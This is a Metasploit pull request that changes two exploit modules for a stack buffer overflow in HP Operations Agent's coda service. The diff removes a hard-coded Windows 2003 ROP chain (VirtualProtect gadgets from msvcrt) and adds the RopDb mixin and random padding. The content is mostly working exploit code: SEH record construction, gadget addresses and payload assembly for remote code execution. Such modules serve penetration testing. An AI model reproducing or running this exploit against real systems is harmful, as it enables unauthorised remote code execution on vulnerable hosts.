### PR TITLE
hp operations agent mods: fix use of pattern_create, use ropdb

### DIFF
--- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
+++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Remote::Seh
+	include Msf::Exploit::RopDb
 
 	def initialize
 		super(
@@ -182,37 +183,10 @@ user-agent: BBC 11.00.044;  14
 			bof << payload.encoded
 			bof << rand_text(4000) # Allows to trigger exception
 		else # Windows 2003
-			rop_gadgets =
-				[
-					0x77bb2563, # POP EAX # RETN
-					0x77ba1114, # <- *&VirtualProtect()
-					0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-					junk,
-					0x77bb0c86, # XCHG EAX,ESI # RETN
-					0x77bc9801, # POP EBP # RETN
-					0x77be2265, # ptr to 'push esp #  ret'
-					0x77bb2563, # POP EAX # RETN
-					0x03C0990F,
-					0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
-					0x77bb48d3, # POP EBX, RET
-					0x77bf21e0, # .data
-					0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
-					0x77bbfc02, # POP ECX # RETN
-					0x77bef001, # W pointer (lpOldProtect) (-> ecx)
-					0x77bd8c04, # POP EDI # RETN
-					0x77bd8c05, # ROP NOP (-> edi)
-					0x77bb2563, # POP EAX # RETN
-					0x03c0984f,
-					0x77bdd441, # SUB EAX, 03c0940f
-					0x77bb8285, # XCHG EAX,EDX # RETN
-					0x77bb2563, # POP EAX # RETN
-					nop,
-					0x77be6591, # PUSHAD # ADD AL,0EF # RETN
-				].pack("V*")
-			bof = Rex::Text.pattern_create(target['RopOffset'])
-			bof << rop_gadgets
-			bof << payload.encoded
-			my_payload_length =  target['RopOffset'] + rop_gadgets.length + payload.encoded.length
+			rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'})
+			bof = rand_text(target['RopOffset'])
+			bof << rop_payload
+			my_payload_length =  target['RopOffset'] + rop_payload.length
 			bof << rand_text(target['Offset'] - my_payload_length)
 			bof << generate_seh_record(target.ret)
 			bof << rand_text(4000) # Allows to trigger exception

--- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
+++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Remote::Seh
+	include Msf::Exploit::RopDb
 
 	def initialize
 		super(
@@ -182,37 +183,10 @@ user-agent: BBC 11.00.044;  14
 			bof << payload.encoded
 			bof << rand_text(4000) # Allows to trigger exception
 		else # Windows 2003
-			rop_gadgets =
-				[
-					0x77bb2563, # POP EAX # RETN
-					0x77ba1114, # <- *&VirtualProtect()
-					0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-					junk,
-					0x77bb0c86, # XCHG EAX,ESI # RETN
-					0x77bc9801, # POP EBP # RETN
-					0x77be2265, # ptr to 'push esp #  ret'
-					0x77bb2563, # POP EAX # RETN
-					0x03C0990F,
-					0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
-					0x77bb48d3, # POP EBX, RET
-					0x77bf21e0, # .data
-					0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
-					0x77bbfc02, # POP ECX # RETN
-					0x77bef001, # W pointer (lpOldProtect) (-> ecx)
-					0x77bd8c04, # POP EDI # RETN
-					0x77bd8c05, # ROP NOP (-> edi)
-					0x77bb2563, # POP EAX # RETN
-					0x03c0984f,
-					0x77bdd441, # SUB EAX, 03c0940f
-					0x77bb8285, # XCHG EAX,EDX # RETN
-					0x77bb2563, # POP EAX # RETN
-					nop,
-					0x77be6591, # PUSHAD # ADD AL,0EF # RETN
-				].pack("V*")
-			bof = Rex::Text.pattern_create(target['RopOffset'])
-			bof << rop_gadgets
-			bof << payload.encoded
-			my_payload_length =  target['RopOffset'] + rop_gadgets.length + payload.encoded.length
+			rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'})
+			bof = rand_text(target['RopOffset'])
+			bof << rop_payload
+			my_payload_length = target['RopOffset'] + rop_payload.length
 			bof << rand_text(target['Offset'] - my_payload_length)
 			bof << generate_seh_record(target.ret)
 			bof << rand_text(4000) # Allows to trigger exception


### PR DESCRIPTION
Fix two things in HP Operations Agent exploits:
- Forgot to change from pattern_create to rand_text, thanks MC for pointing!
- Use of RopDB! I cannot forget about using our owns mixins :)
